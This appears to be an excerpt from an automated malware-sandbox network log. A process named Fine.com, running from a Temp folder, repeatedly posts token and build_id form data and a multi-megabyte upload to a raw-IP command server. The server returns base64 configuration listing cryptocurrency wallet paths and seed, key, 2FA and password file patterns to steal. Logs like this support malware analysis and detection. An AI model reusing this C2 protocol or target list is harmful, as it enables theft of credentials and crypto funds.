                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:17 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:17 UTC717OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-12 16:23:18 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                                          Date: Sun, 12 Jan 2025 16:23:18 GMT
                                                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                          Connection: close
2025-01-12 16:23:18 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.5 | 50114 | 13.89.179.13 | 443 | 7340 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-12 16:23:17 UTC | 1043 | OUT | POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736698995943&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                                                          Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                          Content-Length: 9750
                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                          Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                          Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                          Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                          Cookie: USRLOC=; MUID=0DA5835E35016A581E46962C34736B24; _EDGE_S=F=1&SID=20E67ACFE4B162710D046FBDE5F963E6; _EDGE_V=1; msnup=; _C_ETH=1
2025-01-12 16:23:17 UTC | 9750 | OUT | Data Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 43 6f 6e 74 65 6e 74 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 31 32 54 31 36 3a 32 33 3a 31 35 2e 39 34 32 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 35 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 32 64 32 66 32 61 64 65 2d 38 37 38 61 2d 34 66 61 34 2d 39 62 33 31 2d 30 35 39 37 37 38 31 62 66 33 30 37 22 2c 22 65 70 6f 63 68 22 3a 22 37 34 37 34 34 35 36 34 30 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61
                                                                                                                                                                                                                                                                                                                          Data Ascii: {"name":"MS.News.Web.ContentView","time":"2025-01-12T16:23:15.942Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":5,"installId":"2d2f2ade-878a-4fa4-9b31-0597781bf307","epoch":"747445640"},"app":{"loca
2025-01-12 16:23:17 UTC | 890 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                          P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                                          Set-Cookie: MC1=GUID=c892572238584695badfb691620a2ed3&HASH=c892&LV=202501&V=4&LU=1736698997487; Domain=.microsoft.com; Expires=Mon, 12 Jan 2026 16:23:17 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                          Set-Cookie: MS0=99520254ba2e4ef48c821ac90bece4aa; Domain=.microsoft.com; Expires=Sun, 12 Jan 2025 16:53:17 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                          time-delta-millis: 1544
                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                                          Date: Sun, 12 Jan 2025 16:23:16 GMT
                                                                                                                                                                                                                                                                                                                          Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.5 | 50115 | 195.201.141.106 | 443 | 1440 | C:\Users\user\AppData\Local\Temp\424372\Fine.com
Timestamp | Bytes transferred | Direction | Data
2025-01-12 16:23:19 UTC | 186 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----YM7YMOHLXBIEUAIMOP89
                                                                                                                                                                                                                                                                                                                          Host: 195.201.141.106
                                                                                                                                                                                                                                                                                                                          Content-Length: 6990993
                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
2025-01-12 16:23:19 UTC | 16355 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 59 4d 37 59 4d 4f 48 4c 58 42 49 45 55 41 49 4d 4f 50 38 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 66 62 31 62 30 37 30 65 35 33 32 61 39 65 63 38 34 64 65 37 35 66 61 34 35 30 35 34 37 63 0d 0a 2d 2d 2d 2d 2d 2d 59 4d 37 59 4d 4f 48 4c 58 42 49 45 55 41 49 4d 4f 50 38 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 31 64 34 63 63 38 35 35 64 64 36 66 36 33 35 30 61 31 65 61 64 66 36 37 32 30 61 64 31 63 66 0d 0a 2d 2d 2d 2d 2d 2d 59 4d 37 59 4d 4f 48 4c 58 42 49 45 55 41 49 4d 4f 50 38 39 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                                          Data Ascii: ------YM7YMOHLXBIEUAIMOP89Content-Disposition: form-data; name="token"effb1b070e532a9ec84de75fa450547c------YM7YMOHLXBIEUAIMOP89Content-Disposition: form-data; name="build_id"a1d4cc855dd6f6350a1eadf6720ad1cf------YM7YMOHLXBIEUAIMOP89Cont
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:19 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:19 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:19 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:19 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:19 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:19 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-12 16:23:26 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sun, 12 Jan 2025 16:23:26 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.5 | 50117 | 195.201.141.106 | 443 | 1440 | C:\Users\user\AppData\Local\Temp\424372\Fine.com

Timestamp | Bytes transferred | Direction | Data
2025-01-12 16:23:20 UTC | 182 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----EUSR9ZUKXLNYMY589HL6
Host: 195.201.141.106
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2025-01-12 16:23:20 UTC | 331 | OUT | Data Ascii:
------EUSR9ZUKXLNYMY589HL6
Content-Disposition: form-data; name="token"

effb1b070e532a9ec84de75fa450547c
------EUSR9ZUKXLNYMY589HL6
Content-Disposition: form-data; name="build_id"

a1d4cc855dd6f6350a1eadf6720ad1cf
------EUSR9ZUKXLNYMY589HL6
Cont
2025-01-12 16:23:21 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sun, 12 Jan 2025 16:23:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2025-01-12 16:23:21 UTC | 2228 | IN |
                                                                                                                                                                                                                                                                                                                          Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.5 | 50120 | 195.201.141.106 | 443 | 1440 | C:\Users\user\AppData\Local\Temp\424372\Fine.com

Timestamp | Bytes transferred | Direction | Data
2025-01-12 16:23:22 UTC | 182 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----BA1VAI58YMYU379R1D26
Host: 195.201.141.106
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2025-01-12 16:23:22 UTC | 331 | OUT | Data Ascii:
------BA1VAI58YMYU379R1D26
Content-Disposition: form-data; name="token"

effb1b070e532a9ec84de75fa450547c
------BA1VAI58YMYU379R1D26
Content-Disposition: form-data; name="build_id"

a1d4cc855dd6f6350a1eadf6720ad1cf
------BA1VAI58YMYU379R1D26
Cont
2025-01-12 16:23:22 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sun, 12 Jan 2025 16:23:22 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2025-01-12 16:23:22 UTC | 1524 | IN |
                                                                                                                                                                                                                                                                                                                          Data Ascii: 5e8REVTS1RPUHwlREVTS1RPUCVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKiwqaGl0Yn


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.5 | 50124 | 195.201.141.106 | 443 | 1440 | C:\Users\user\AppData\Local\Temp\424372\Fine.com
Timestamp | Bytes transferred | Direction | Data
2025-01-12 16:23:23 UTC | 182 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----4WTRQIMYUSJM7YMOHDTR
Host: 195.201.141.106
Content-Length: 453
Connection: Keep-Alive
Cache-Control: no-cache
2025-01-12 16:23:23 UTC | 453 | OUT | Data Ascii:
------4WTRQIMYUSJM7YMOHDTR
Content-Disposition: form-data; name="token"

effb1b070e532a9ec84de75fa450547c
------4WTRQIMYUSJM7YMOHDTR
Content-Disposition: form-data; name="build_id"

a1d4cc855dd6f6350a1eadf6720ad1cf
------4WTRQIMYUSJM7YMOHDTR
Cont
2025-01-12 16:23:24 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sun, 12 Jan 2025 16:23:24 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2025-01-12 16:23:24 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.5 | 50134 | 195.201.141.106 | 443 | 1440 | C:\Users\user\AppData\Local\Temp\424372\Fine.com
Timestamp | Bytes transferred | Direction | Data
2025-01-12 16:23:27 UTC | 184 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----IEUKNOH47GVAAAAIM7GL
Host: 195.201.141.106
Content-Length: 98165
Connection: Keep-Alive
Cache-Control: no-cache
2025-01-12 16:23:27 UTC | 16355 | OUT | Data Ascii:
------IEUKNOH47GVAAAAIM7GL
Content-Disposition: form-data; name="token"

effb1b070e532a9ec84de75fa450547c
------IEUKNOH47GVAAAAIM7GL
Content-Disposition: form-data; name="build_id"

a1d4cc855dd6f6350a1eadf6720ad1cf
------IEUKNOH47GVAAAAIM7GL
Cont
2025-01-12 16:23:27 UTC | 35 | OUT | Data Raw: 66 2f 5a 0d 0a 2d 2d 2d 2d 2d 2d 49 45 55 4b 4e 4f 48 34 37 47 56 41 41 41 41 49 4d 37 47 4c 2d 2d 0d 0a
Data Ascii: f/Z------IEUKNOH47GVAAAAIM7GL--
2025-01-12 16:23:28 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sun, 12 Jan 2025 16:23:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2025-01-12 16:23:28 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.5 | 50137 | 195.201.141.106 | 443 | 1440 | C:\Users\user\AppData\Local\Temp\424372\Fine.com
Timestamp | Bytes transferred | Direction | Data
2025-01-12 16:23:29 UTC | 182 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----FCB1VK689RQIEUAIMOPZ
Host: 195.201.141.106
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2025-01-12 16:23:29 UTC | 331 | OUT | Data Ascii:
------FCB1VK689RQIEUAIMOPZ
Content-Disposition: form-data; name="token"

effb1b070e532a9ec84de75fa450547c
------FCB1VK689RQIEUAIMOPZ
Content-Disposition: form-data; name="build_id"

a1d4cc855dd6f6350a1eadf6720ad1cf
------FCB1VK689RQIEUAIMOPZ
Cont
2025-01-12 16:23:30 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sun, 12 Jan 2025 16:23:29 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2025-01-12 16:23:30 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.5 | 50142 | 195.201.141.106 | 443 | 1440 | C:\Users\user\AppData\Local\Temp\424372\Fine.com
Timestamp | Bytes transferred | Direction | Data
2025-01-12 16:23:30 UTC | 182 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----NYC2NO8Q1DJEU3O890R9
Host: 195.201.141.106
Content-Length: 331
                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
